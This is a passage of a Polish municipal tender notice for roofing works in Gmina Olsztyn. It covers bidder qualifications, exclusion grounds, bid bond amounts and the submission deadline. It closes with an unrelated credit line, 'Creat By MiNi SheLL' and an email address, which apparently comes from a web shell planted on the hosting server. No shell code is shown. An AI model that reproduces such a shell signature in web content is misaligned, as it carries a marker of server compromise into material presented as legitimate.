roboty odpowiadające swoim rodzajem robocie budowlanej stanowiącej przedmiot zamówienia (roboty dachowe) oraz załączenie dokumentów potwierdzających, że roboty te zostały wykonane należycie / minimum 2 referencje lub opinie o wartości łącznej co najmniej <br/>30 000,00 zł netto.<br/><br/>Dotyczy zadania 3<br/>W celu potwierdzenia posiadania niezbędnej wiedzy i doświadczenia Wykonawcy zobowiązują się udokumentować zrealizowanie w okresie ostatnich 5 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie, co najmniej 2 roboty odpowiadające swoim rodzajem robocie budowlanej stanowiącej przedmiot zamówienia (roboty dachowe) oraz załączenie dokumentów potwierdzających, że roboty te zostały wykonane należycie / minimum 2 referencje lub opinie o wartości łącznej co najmniej <br/>30 000,00 zł netto.<br/><br/><br/>1.2. Dysponowania odpowiednim potencjałem technicznym oraz osobami zdolnymi do wykonania zamówienia:<br/>W celu uznania, że Wykonawca spełnia warunek dysponowania odpowiednim potencjałem technicznym oraz osobami zdolnymi do wykonania zamówienia, Zamawiający wymaga by Wykonawca wykazał:<br/><br/>1.2.1 Potencjał kadrowy<br/>Dotyczy zadania 1<br/>Za spełnienie warunku dotyczącego dysponowaniem zdolności zawodowej Zamawiający uzna dysponowanie co najmniej 1 osobą posiadającą kwalifikacje uprawniające do kierowania robotami budowlanymi przy zabytkach nieruchomych wpisanych do rejestru, zgodnie z zapisami Ustawy o ochronie zabytków i opiece nad zabytkami (Dz. U. 2021.0.710 tj. rozdział 3, art. 37c) wraz z dokumentami potwierdzającymi kwalifikacje zawodowe wymagane do wykonania zamówienia wynikającego z obowiązujących przepisów w tym prawa budowlanego – wraz z informacją o podstawie do dysponowania tą osobą.<br/><br/>Dotyczy zadania 2<br/>Za spełnienie warunku dotyczącego dysponowaniem zdolności zawodowej Zamawiający uzna dysponowanie co najmniej 1 osobą posiadającą kwalifikacje uprawniające do kierowania robotami budowlanymi w specjalności konstrukcyjno – budowlanej bez ograniczeń i która będzie pełnić funkcję kierownika budowy / robót wraz z dokumentami potwierdzającymi kwalifikacje zawodowe wymagane do wykonania zamówienia wynikającego z obowiązujących przepisów w tym prawa budowlanego – wraz z informacją o podstawie do dysponowania tą osobą.<br/><br/>Dotyczy zadania 3<br/>Za spełnienie warunku dotyczącego dysponowaniem zdolności zawodowej Zamawiający uzna dysponowanie co najmniej 1 osobą posiadającą kwalifikacje uprawniające do kierowania robotami budowlanymi w specjalności konstrukcyjno – budowlanej bez ograniczeń i która będzie pełnić funkcję kierownika budowy / robót wraz z dokumentami potwierdzającymi kwalifikacje zawodowe wymagane do wykonania zamówienia wynikającego z obowiązujących przepisów w tym prawa budowlanego – wraz z informacją o podstawie do dysponowania tą osobą.<br/><br/>1.3 Sytuacja ekonomiczna i finansowa<br/>Dotyczy zadania 1<br/>Wykonawca na każde zadanie, na które składa ofertę musi wykazać posiadanie opłaconej polisy lub innego dokumentu potwierdzającego, że Wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia na kwotę co najmniej 150000,00zł.<br/><br/>Dotyczy zadania 2<br/>Wykonawca na każde zadanie, na które składa ofertę musi wykazać posiadanie opłaconej polisy lub innego dokumentu potwierdzającego, że Wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia na kwotę co najmniej 30000,00zł.<br/><br/>Dotyczy zadania 3<br/>Wykonawca na każde zadanie, na które składa ofertę musi wykazać posiadanie opłaconej polisy lub innego dokumentu potwierdzającego, że Wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia na kwotę co najmniej 30000,00zł.<br/><br/>2. Z postępowania o udzielenie zamówienia wyklucza się Wykonawcę w stosunku, do którego zachodzi którakolwiek z okoliczności, o których mowa w art. 108 ustawy.<br/>3. Ponadto Zamawiający wykluczy z postępowania Wykonawcę:<br/>1) w stosunku, do którego otwarto likwidację, ogłoszono upadłość, którego aktywami zarządza likwidator lub sąd, zawarł układ z wierzycielami, którego działalność gospodarcza jest zawieszona albo znajduje się on w innej tego rodzaju sytuacji wynikającej z podobnej procedury przewidzianej w przepisach miejsca wszczęcia tej procedury (art. 109 ust. 1 pkt. 4 ustawy), chyba, że Wykonawca wykaże spełnienie przesłanek, o których mowa w art. 110 ust. 2 ustawy;<br/>2) który naruszył obowiązki dotyczące płatności podatków, opłat lub składek na ubezpieczenia społeczne lub zdrowotne, z wyjątkiem przypadku, o którym mowa w art. 108 ust. 1 pkt 3, chyba że wykonawca odpowiednio przed upływem terminu do składania wniosków o dopuszczenie do udziału w postępowaniu albo przed upływem terminu składania ofert dokonał płatności należnych podatków, opłat lub składek na ubezpieczenia społeczne lub zdrowotne wraz z odsetkami lub grzywnami lub zawarł wiążące porozumienie w sprawie spłaty tych należności (art. 109 ust. 1 pkt. 1 ustawy);<br/>4. Zamawiający może wykluczyć Wykonawcę na każdym etapie postępowania o udzielenie zamówienia.<br/>5. Zamawiający na mocy art. 108 ust. 1 pkt. 5-6 ustawy wykluczy z postępowania o udzielenie zamówienia publicznego Wykonawców, którzy należąc do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007r. o ochronie konkurencji i konsumentów (t.j. Dz.U. z 2021r. poz. 275 t.j.) złożyli odrębne oferty, chyba że wykażą, że istniejące między nimi powiązania nie prowadzą do zakłócenia konkurencji w postępowaniu o udzielenie zamówienia.<br/>6. Podstawy wykluczenia nie mogą zachodzić wobec któregokolwiek z Wykonawców wspólnie ubiegających się o udzielenie zamówienia. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">1.	Sporządzony przez Wykonawcę FORMULARZ OFERTOWY wg wzoru stanowiącego załącznik nr 7a, 7b, 7c do SWZ wraz z kosztorysem ofertowym potwierdzającym cenę przedstawioną w ofercie (kalkulację). <br/>2.	Wykonawca dołącza do oferty aktualne na dzień składania oferty, oświadczenie w zakresie dot. braku podstaw do wykluczenia z udziału w postępowaniu oraz w zakresie dot. spełnienia warunków udziału w postępowaniu. Druk oświadczenia dotyczącego zarówno braku podstaw do wykluczenia jak i spełniania warunków udziału w postępowaniu stanowi odpowiednio załącznik nr 1 oraz 1A do SWZ. <br/>3.	Wykonawca, który powołuje się na zasoby innych podmiotów w celu wykazania braku istnienia wobec nich podstaw wykluczenia oraz spełnienia, w zakresie, w jakim powoduje się na ich zasoby, warunków udziału w postępowaniu – zamieszcza również informację o tych podmiotach w oświadczeniu dot. zarówno braku podstaw do wykluczenia jak i spełniania warunków udziału w postępowaniu, które stanowią w/w załącznik nr 1oraz 1A do SWZ.<br/>4.	Jeżeli Wykonawca zamierza powierzyć części zamówienia podwykonawcy, w celu wykazania braku istnienia wobec nich podstaw do wykluczenia z udziału w postępowaniu zamieszcza również informację o tych podmiotach w w/w oświadczeniu który stanowi załącznik nr 1 do SWZ.<br/>5.	W przypadku wspólnego ubiegania się o zamówienie przez Wykonawców oświadczenie dot. spełniania warunków udziału w postępowaniu, składa każdy z Wykonawców wspólnie ubiegających o zamówienie. Dokument ten potwierdza spełnianie warunków udziału w postępowaniu w zakresie, w którym każdy z Wykonawców wykazuje spełnienie warunków udziału w postępowaniu. Druk oświadczenia dot. spełniania warunków udziału w postępowaniu stanowi załącznik nr 1A do SWZ. <br/>6.	Każdy z Wykonawców wspólnie ubiegających się o zamówienie składa oświadczenie dot. braku podstaw do wykluczenia z udziału w postępowaniu. Druk oświadczenia dot. braku podstaw do wykluczenia z udziału w postępowaniu, stanowi załącznik nr 1 do SWZ.<br/>7.	Jeżeli Wykonawca, w celu potwierdzenia spełniania warunków udziału w postępowaniu, w stosownych sytuacjach oraz w odniesieniu do konkretnego zamówienia, polega na zdolnościach technicznych lub zawodowych lub sytuacji finansowej lub ekonomicznej innych podmiotów, jest zobowiązany dołączyć do ofert zobowiązanie tego podmiotu trzeciego, które musi co najmniej określać:<br/>a)	zakres dostępnych Wykonawcy zasobów innego podmiotu; <br/>b)	sposób wykorzystania zasobów innego podmiotu przez wykonawcę przy wykonywaniu zamówienia publicznego; <br/>c)	zakres i okres udziału innego podmiotu w wykonywaniu zamówienia publicznego; <br/>d)	oświadczenie, że podmiot, na zdolnościach którego wykonawca polega w odniesieniu do warunków udziału w postępowaniu dotyczących wykształcenia, kwalifikacji zawodowych lub doświadczenia, zrealizuje roboty budowlane lub usługi, których wskazane zdolności dotyczą.<br/><br/>W celu wykazania braku podstaw do wykluczenia z postępowania o udzielenie zamówienia, Zamawiający żąda złożenia oświadczenia wykonawcy, w zakresie art. 108 ust. 1 pkt 5 ustawy, o braku przynależności do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów (Dz. U. z 2020 r. poz. 1076 i 1086), z innym wykonawcą, który złożył odrębną ofertę, ofertę częściową lub wniosek o dopuszczenie do udziału w postępowaniu, albo oświadczenia o przynależności do tej samej grupy kapitałowej wraz z dokumentami lub informacjami potwierdzającymi przygotowanie oferty, oferty częściowej lub wniosku o dopuszczenie do udziału w postępowaniu niezależnie od innego wykonawcy należącego do tej samej grupy kapitałowej Druk oświadczenia o przynależności lub braku przynależności do tej samej grupy kapitałowej stanowi załącznik nr 2 do SWZ.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">W celu wykazania braku podstaw do wykluczenia z postępowania o<br/>udzielenie zamówienia, Zamawiający żąda złożenia oświadczenia wykonawcy, w zakresie art. 108 ust.<br/>1 pkt 5 ustawy, o braku przynależności do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16<br/>lutego 2007 r. o ochronie konkurencji i konsumentów (Dz. U. z 2020 r. poz. 1076 i 1086), z innym<br/>wykonawcą, który złożył odrębną ofertę, ofertę częściową lub wniosek o dopuszczenie do udziału w<br/>postępowaniu, albo oświadczenia o przynależności do tej samej grupy kapitałowej wraz z<br/>dokumentami lub informacjami potwierdzającymi przygotowanie oferty, oferty częściowej lub wniosku o<br/>dopuszczenie do udziału w postępowaniu niezależnie od innego wykonawcy należącego do tej samej<br/>grupy kapitałowej</span> </h3> <h3 class="mb-0">5.8.) Wykaz przedmiotowych środków dowodowych: </h3> 1)	Dot. zdolności technicznej i zawodowej (wykaz wykonanych robót i wykazanie dysponowania potencjałem kadrowym (kierownik robót) wraz z informacją o podstawie do dysponowania osobą – załącznik nr 3,4,5 do SWZ.<br/>2)	Dot. zdolności ekonomicznej (wykazanie posiadania aktualnej, opłaconej polisy ubezpieczeniowej lub innego dokumentu potwierdzającego, że Wykonawca jest ubezpieczony od odpowiedzialności cywilnej). <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.4.1) Informacje dotyczące wadium: </h3> 1. Zamawiający ustala wadium w wysokości: <br/>Dotyczy zadania 1 - 3200,00 zł<br/>Dotyczy zadania 2 – 500,00 zł<br/>Dotyczy zadania 3 – 500,00 zł <br/>2. Zgodnie z art. 97 ust. 5 ustawy Pzp Wykonawca zobowiązany jest do wniesienia wadium przed upływem terminu składania ofert określonego w SWZ. <br/>3. Wadium może być wnoszone według wyboru Wykonawcy w jednej lub w kilku następujących formach: <br/>1) pieniądzu, przelewem na rachunek Zamawiającego: (w tytule przelewu należy wpisać nazwę postępowania i NIP),<br/>Bank PKO BP SA, numer konta: 19 1020 3541 0000 5102 0290 8820 <br/>W przypadku wniesienia wadium przelewem w pieniądzu, decyduje data uznania kwotą wadium rachunku Zamawiającego. <br/>2) gwarancjach bankowych; <br/>3) gwarancjach ubezpieczeniowych; <br/>4) poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz.U. 2019 poz. 310 ze zm.). <br/>4. W przypadku wniesienia wadium w formie gwarancji bankowej lub ubezpieczeniowej treść gwarancji musi spełniać co najmniej poniższe wymagania: <br/>1) zobowiązanie gwaranta (banku, ubezpieczyciela) do zapłaty kwoty wadium nieodwołalnie i bezwarunkowo na pierwsze żądanie Zamawiającego wzywające do zapłaty i zawierające oświadczenie, że zaistniały okoliczności wymienione w art. 98 ust. 6 ustawy Pzp bez obowiązku potwierdzania tych okoliczności; <br/>2) termin obowiązywania gwarancji, który nie może być krótszy niż termin związania ofertą (z zastrzeżeniem, iż pierwszym dniem związania ofertą jest dzień składania ofert); <br/>3) musi obejmować odpowiedzialność za wszystkie przypadki powodujące utratę wadium przez Wykonawcę określone w art. 98 ust. 6 ustawy Pzp; <br/>4) z jej treści powinno jednoznacznie wynikać zobowiązanie gwaranta do zapłaty całej kwoty wadium; <br/>5) w treści poręczenia lub gwarancji powinna znaleźć się nazwa oraz numer przedmiotowego postępowania; <br/>6) w przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia, Zamawiający wymaga, aby poręczenie lub gwarancja obejmowała swą treścią zobowiązanych z tytułu poręczenia lub gwarancji wszystkich Wykonawców wspólnie ubiegających się o udzielenie zamówienia lub aby z jej treści wynikało, że zabezpiecza ofertę Wykonawców wspólnie ubiegających się o udzielenie zamówienia (konsorcjum); <br/>7) oryginał wadium, sporządzony w postaci elektronicznej nie może zawierać postanowień uzależniających jego dalsze obowiązywanie od zwrotu oryginału dokumentu gwarancyjnego do gwaranta. <br/>5. W przypadku wniesienia wadium w formie: <br/>1) pieniężnej – zaleca się, by dowód dokonania przelewu został dołączony do oferty; <br/>2) poręczeń lub gwarancji – oryginał dokumentu należy złożyć wraz z ofertą w postaci elektronicznej. <br/>7. Zamawiający dokona zwrotu lub zatrzymania wadium zgodnie z art. 98 ustawy Pzp. <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 1.	Projektowane postanowienia umowy określone zostały w Projekcie umowy, stanowiącym Załącznik Nr 6a, 6b, 6c do SWZ.<br/>2.	Zamawiający zgodnie z art. 455 ust. 1 pkt 1 ustawy Pzp, przewiduje możliwość zmian postanowień zawartej Umowy w stosunku do treści oferty, na podstawie której dokonano wyboru Wykonawcy, w przypadkach określonych w Umowie. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2021-09-13 12:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Ofertę wraz z wymaganymi załącznikami należy złożyć drogą elektroniczną za pośrednictwem Platformy przetargowej Gminy Olsztyn dostępnej pod adresem: https://gminaolsztyn.logintrade.net/rejestracja/ustawowe.html</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2021-09-13 12:00</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal"> 30 dni </span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com